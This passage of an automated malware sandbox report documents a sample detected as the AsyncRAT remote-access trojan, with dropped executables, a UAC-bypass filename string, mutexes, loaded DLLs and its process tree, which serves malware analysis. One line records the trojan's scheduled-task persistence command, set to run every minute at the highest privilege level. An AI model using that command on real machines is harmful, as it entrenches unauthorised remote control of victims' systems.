                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E1660E815_2_000002234E1660E8
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000023942AF3E1816_2_0000023942AF3E18
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000023942AED65016_2_0000023942AED650
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000023942AE1F4016_2_0000023942AE1F40
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000023942B12B4016_2_0000023942B12B40
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000023942B24A1816_2_0000023942B24A18
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000023942B1E25016_2_0000023942B1E250
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001EF056A1F4017_2_000001EF056A1F40
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001EF056AD65017_2_000001EF056AD650
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001EF056B3E1817_2_000001EF056B3E18
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001EF056D2B4017_2_000001EF056D2B40
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001EF056DE25017_2_000001EF056DE250
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001EF056E621817_2_000001EF056E6218
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001EF056E4A1817_2_000001EF056E4A18
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_000002287AD860E818_2_000002287AD860E8
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_000002287AD72B4018_2_000002287AD72B40
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_000002287AD8621818_2_000002287AD86218
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_000002287AD84A1818_2_000002287AD84A18
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_000002287AD7E25018_2_000002287AD7E250
                Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001B94DA61F4019_2_000001B94DA61F40
                Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001B94DA6D65019_2_000001B94DA6D650
                Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001B94DA73E1819_2_000001B94DA73E18
                Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001B94DA92B4019_2_000001B94DA92B40
                Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001B94DA9E25019_2_000001B94DA9E250
                Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001B94DAA4A1819_2_000001B94DAA4A18
                Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000025202553E1820_2_0000025202553E18
                Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002520254D65020_2_000002520254D650
                Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000025202541F4020_2_0000025202541F40
                Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002520258621820_2_0000025202586218
                Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000025202584A1820_2_0000025202584A18
                Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002520257E25020_2_000002520257E250
                Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000025202572B4020_2_0000025202572B40
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001A9EBFC2B4021_2_000001A9EBFC2B40
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001A9EBFCE25021_2_000001A9EBFCE250
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001A9EBFD4A1821_2_000001A9EBFD4A18
                Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000019FF1601F4022_2_0000019FF1601F40
                Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000019FF1613E1822_2_0000019FF1613E18
                Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000019FF160D65022_2_0000019FF160D650
                Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000019FF1632B4022_2_0000019FF1632B40
                Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000019FF1644A1822_2_0000019FF1644A18
                Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000019FF163E25022_2_0000019FF163E250
                Source: Joe Sandbox View | Dropped File: C:\Users\user\Desktop\wzcsvc.exe F7DD8D6299C108A3221C31BF33637F59F0E19703AAA88B1E3A4F1093E7209A5D
                Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 1408 -ip 1408
                Source: wzcsvc.exe.1.dr | Static PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                Source: r8k29DBraE.exe, 00000001.00000000.1322519475.000002616CAB2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamewzshlstb.exe4 vs r8k29DBraE.exe
                Source: r8k29DBraE.exe, 00000001.00000000.1322519475.000002616CAB2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamesimple.exe" vs r8k29DBraE.exe
                Source: r8k29DBraE.exe, 00000001.00000002.1595250313.00000261000C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameEncrypted.exe4 vs r8k29DBraE.exe
                Source: r8k29DBraE.exe, 00000001.00000002.1598791740.000002616E810000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamewzshlstb.exe4 vs r8k29DBraE.exe
                Source: r8k29DBraE.exe, 00000001.00000002.1598791740.000002616E810000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamesimple.exe" vs r8k29DBraE.exe
                Source: r8k29DBraE.exe, 00000001.00000000.1322519475.000002616CB38000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameBypassUAC.exe4 vs r8k29DBraE.exe
                Source: r8k29DBraE.exe | Binary or memory string: OriginalFilenamewzshlstb.exe4 vs r8k29DBraE.exe
                Source: r8k29DBraE.exe | Binary or memory string: OriginalFilenamesimple.exe" vs r8k29DBraE.exe
                Source: r8k29DBraE.exe | Binary or memory string: OriginalFilenameBypassUAC.exe4 vs r8k29DBraE.exe
                Source: 3.2.wzcsapi.exe.28cf290.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 3.2.wzcsapi.exe.1bee0000.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000003.00000002.2674092147.000000001BEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000003.00000002.2644119365.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: r8k29DBraE.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: wzcsapi.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: r8k29DBraE.exe, -Module-.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 1.2.r8k29DBraE.exe.2616e810000.11.raw.unpack, ---99w-ak--ev-8q-lg-7--bo.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 1.2.r8k29DBraE.exe.2616e810000.11.raw.unpack, 2-eaq-rvqt-9ov-hv8-iamz6-p-.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 1.2.r8k29DBraE.exe.2611006dab0.2.raw.unpack, ---99w-ak--ev-8q-lg-7--bo.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 1.2.r8k29DBraE.exe.2611006dab0.2.raw.unpack, 2-eaq-rvqt-9ov-hv8-iamz6-p-.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, Iloveyou.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, Iloveyou.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.r8k29DBraE.exe.261000e7650.1.raw.unpack, Program.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 1.2.r8k29DBraE.exe.261000e7650.1.raw.unpack, Program.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, Youwillstay.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, Youwillstay.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, Youwillstay.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, Youwillstay.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: wzcsapi.exe.1.dr, Program.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: wzcsapi.exe.1.dr, Program.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: System.evtx.23.dr | Binary string: \Device\HarddiskVolume3\Windows\ImmersiveControlPanel\SystemSettings.exeX
                Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.23.dr | Binary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
                Source: Microsoft-Windows-SMBServer%4Operational.evtx.23.dr | Binary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
                Source: wzcsvc.exe.1.dr | Binary string: SOFTWARE\wzconfigstartuppidprocess_namespathsservice_namestcp_localtcp_remoteudp\\?\NtQueryObjectntdll.dllNtQuerySystemInformationNtResumeThreadNtQueryDirectoryFileNtQueryDirectoryFileExNtEnumerateKeyNtEnumerateValueKeyEnumServiceGroupWadvapi32.dllEnumServicesStatusExWsechost.dllNtDeviceIoControlFile\\.\pipe\wzchildproc64\\.\pipe\wzchildproc32\\.\pipe\\Device\Nsiwz@
                Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.23.dr | Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.23.dr | Binary string: O\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
                Source: Microsoft-Windows-SMBServer%4Operational.evtx.23.dr | Binary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
                Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.23.dr | Binary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
                Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.23.dr | Binary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
                Source: Microsoft-Windows-SMBServer%4Operational.evtx.23.dr | Binary string: \Device\NetbiosSmb
                Source: System.evtx.23.dr | Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
                Source: System.evtx.23.dr | Binary string: \Device\HarddiskVolume3\Windows\System32\svchost.exe
                Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.23.dr | Binary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                Source: System.evtx.23.dr | Binary string: C:\Device\HarddiskVolume3
                Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.23.dr | Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeP**
                Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.23.dr | Binary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
                Source: System.evtx.23.dr | Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
                Source: System.evtx.23.dr | Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4ic
                Source: System.evtx.23.dr | Binary string: \Device\HarddiskVolume3\Windows\System32\svchost.exeT
                Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.23.dr | Binary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
                Source: System.evtx.23.dr | Binary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
                Source: Microsoft-Windows-SMBServer%4Operational.evtx.23.dr | Binary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
                Source: Microsoft-Windows-SMBServer%4Operational.evtx.23.dr | Binary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
                Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.23.dr | Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
                Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.23.dr | Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
                Source: classification engine | Classification label: mal100.troj.expl.evad.winEXE@16/81@3/4
                Source: C:\Users\user\Desktop\wzcsvc.exe | Code function: 4_2_00007FF6B5AD2264 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx
                Source: C:\Users\user\Desktop\wzcsvc.exe | Code function: 4_2_00007FF6B5AD19BC SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | File created: C:\Users\user\Desktop\wzcsapi.exe
                Source: C:\Users\user\Desktop\wzcsapi.exe | Mutant created: \Sessions\1\BaseNamedObjects\?P?IXNtJ?rCWp?x???MWE?D21Lc??A
                Source: C:\Users\user\Desktop\wzcsapi.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
                Source: C:\Users\user\Desktop\wzcsapi.exe | Mutant created: \Sessions\1\BaseNamedObjects\??8??????9???!???
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Mutant created: \Sessions\1\BaseNamedObjects\zBiiU5rd5BQKcgVCL
                Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1408
                Source: C:\Windows\System32\svchost.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\32002d0d-a128-4623-9bc5-632f4c5e4b48
                Source: r8k29DBraE.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: r8k29DBraE.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | File read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: r8k29DBraE.exe | ReversingLabs: Detection: 66%
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | File read: C:\Users\user\Desktop\r8k29DBraE.exe
                Source: unknown | Process created: C:\Users\user\Desktop\r8k29DBraE.exe "C:\Users\user\Desktop\r8k29DBraE.exe"
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Process created: C:\Users\user\Desktop\wzcsapi.exe "C:\Users\user\Desktop\wzcsapi.exe"
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Process created: C:\Users\user\Desktop\wzcsvc.exe "C:\Users\user\Desktop\wzcsvc.exe"
                Source: C:\Users\user\Desktop\wzcsvc.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 1408 -ip 1408
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1408 -s 1088
                Source: C:\Windows\System32\lsass.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                Source: C:\Users\user\Desktop\wzcsapi.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "wzcsapi" /tr "%Current%\wzcsapi.exe"
                Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\wzcsvc.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Process created: C:\Users\user\Desktop\wzcsapi.exe "C:\Users\user\Desktop\wzcsapi.exe"
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Process created: C:\Users\user\Desktop\wzcsvc.exe "C:\Users\user\Desktop\wzcsvc.exe"
                Source: C:\Users\user\Desktop\wzcsapi.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "wzcsapi" /tr "%Current%\wzcsapi.exe"
                Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 1408 -ip 1408
                Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1408 -s 1088
                Source: C:\Windows\System32\WerFault.exe | Process created: unknown unknown
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: dlnashext.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: wpdshext.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: slc.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\r8k29DBraE.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: slc.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\wzcsapi.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: avicap32.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: msvfw32.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
